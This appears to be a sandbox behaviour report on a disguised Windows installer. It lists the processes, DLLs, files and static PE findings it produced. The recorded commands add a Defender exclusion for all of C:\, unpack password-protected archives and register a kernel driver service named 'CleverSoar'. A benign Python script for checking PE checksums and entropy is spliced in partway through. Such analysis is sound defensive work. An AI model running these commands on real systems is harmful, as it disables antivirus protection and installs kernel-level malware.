Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp "C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar (identical entry listed 31 times in the report)
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe Static file information: File size 5707238 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000B.00000003.1818402436.0000000002F80000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000B.00000003.1818525168.0000000003180000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.11.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00AE57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_00AE57D0
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe Static PE information: real checksum: 0x0 should be: 0x5724cd
Source: update.vac.1.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.5.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: tProtect.dll.11.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: hrsw.vbc.5.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.exe Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.1.dr Static PE information: section name: .00cfg
Source: update.vac.1.dr Static PE information: section name: .voltbl
Source: update.vac.1.dr Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_1.0.8.tmp.4.dr Static PE information: section name: .didata
Source: 7zr.exe.5.dr Static PE information: section name: .sxdata
Source: is-RO25N.tmp.5.dr Static PE information: section name: .xdata
Source: hrsw.vbc.5.dr Static PE information: section name: .00cfg
Source: hrsw.vbc.5.dr Static PE information: section name: .voltbl
Source: hrsw.vbc.5.dr Static PE information: section name: .=~
Source: update.vac.5.dr Static PE information: section name: .00cfg
Source: update.vac.5.dr Static PE information: section name: .voltbl
Source: update.vac.5.dr Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Code function: 5_2_6CA086EB push ecx; ret 5_2_6CA086FE
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Code function: 5_2_6C8B0F00 push ss; retn 0001h 5_2_6C8B0F0A
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Code function: 5_2_6CAD6F10 push eax; ret 5_2_6CAD6F2E
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Code function: 5_2_6CA3B9F4 push 004AC35Ch; ret 5_2_6CA3BA0E
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp Code function: 5_2_6CAD7290 push eax; ret 5_2_6CAD72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00A645F4 push 00B0C35Ch; ret 9_2_00A6460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00AFFB10 push eax; ret 9_2_00AFFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 9_2_00AFFE90 push eax; ret 9_2_00AFFEBE
Source: update.vac.1.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.5.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.5.dr Static PE information: section name: .=~ entropy: 7.19316283520878
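The static findings above come from two checks worth being able to reproduce: the PE header CheckSum (0 on the Inno Setup installer and its .tmp, a non-matching 0x1eb0f on tProtect.dll) and per-section Shannon entropy (7.19 for the oddly named .=~ section of update.vac and hrsw.vbc). The script below is an added example, not part of the Joe Sandbox report or of any of the files it lists: it reimplements both checks and runs them on a minimal PE32 image constructed in build_image(). The section name .=~ is taken from the report; the payloads, the STANDARD_SECTIONS list and the 7.0 entropy threshold are my own choices.

```python
"""PE header checksum and section entropy, as a sandbox's static pass computes them.

Added example. The image built here is a synthetic PE32 that parses but does not
load; nothing below is one of the report's files.
"""
import math
import struct

# Names a compiler/linker normally emits; anything else is worth a second look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc",
                     ".reloc", ".tls", ".pdata", ".xdata", ".didata", ".CRT"}


def pe_checksum(data, checksum_offset):
    """Checksum the way imagehlp's CheckSumMappedFile does: a 16-bit sum with
    end-around carry over the whole file, skipping the 4-byte CheckSum field,
    plus the file length."""
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off == checksum_offset or off == checksum_offset + 2:
            continue
        total += data[off] | (data[off + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)
    if len(data) & 1:                      # odd trailing byte, high byte zero
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def entropy(blob):
    """Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """Return (checksum_field_offset, stored_checksum, [(name, raw_offset, raw_size)])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    checksum_off = opt + 64                # same offset in PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(num_sections):
        hdr = opt + size_opt + 40 * i
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, hdr + 16)
        sections.append((name, raw_ptr, raw_size))
    return checksum_off, stored, sections


def build_image(sections, stored_checksum=0):
    """Construct a minimal PE32 file from [(name, payload)] with 0x200 file alignment."""
    hdr_size = (0x40 + 4 + 20 + 0xE0 + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                         # PE32 magic
    struct.pack_into("<I", opt, 64, stored_checksum)              # CheckSum field
    table, body, ptr = bytearray(), bytearray(), hdr_size
    for name, payload in sections:
        size = (len(payload) + 0x1FF) & ~0x1FF
        table += struct.pack("<8sIIIIIIHHI", name.encode("latin-1"), len(payload), 0,
                             size, ptr, 0, 0, 0, 0, 0x60000020)
        body += payload.ljust(size, b"\0")
        ptr += size
    header = (dos + b"PE\0\0" + coff + opt + table).ljust(hdr_size, b"\0")
    return bytes(header + body)


def static_report(data):
    """Mimic the report's 'real checksum ... should be' and section findings."""
    checksum_off, stored, sections = parse_pe(data)
    expected = pe_checksum(data, checksum_off)
    out = {"stored_checksum": stored, "expected_checksum": expected,
           "checksum_mismatch": stored != expected, "sections": []}
    for name, off, size in sections:
        ent = round(entropy(data[off:off + size]), 3)
        out["sections"].append({"name": name, "entropy": ent,
                                "unusual_name": name not in STANDARD_SECTIONS,
                                "packed_or_encrypted": ent > 7.0})
    return out


# Constructed: a flat code section and a high-entropy section using the report's odd name.
SAMPLE_SECTIONS = [(".text", b"\x90" * 512), (".=~", bytes(range(256)) * 4)]

if __name__ == "__main__":
    print(static_report(build_image(SAMPLE_SECTIONS)))
```

A stored checksum of 0 only means the field was never filled in, which is why the report shows it for the installer, its .tmp and the dropped update.vac; a non-zero value that does not match, as on tProtect.dll, means the bytes changed after the checksum was written or the field itself was edited. The field is excluded from this sum and from the Authenticode hash alike, so the mismatch by itself says nothing about whether a signature on the driver is intact.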
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Program Files (x86)\Windows NT\is-RO25N.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe File created: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe File created: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-VGMC1.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp File created: C:\Users\user\AppData\Local\Temp\is-O51CC.tmp\update.vac
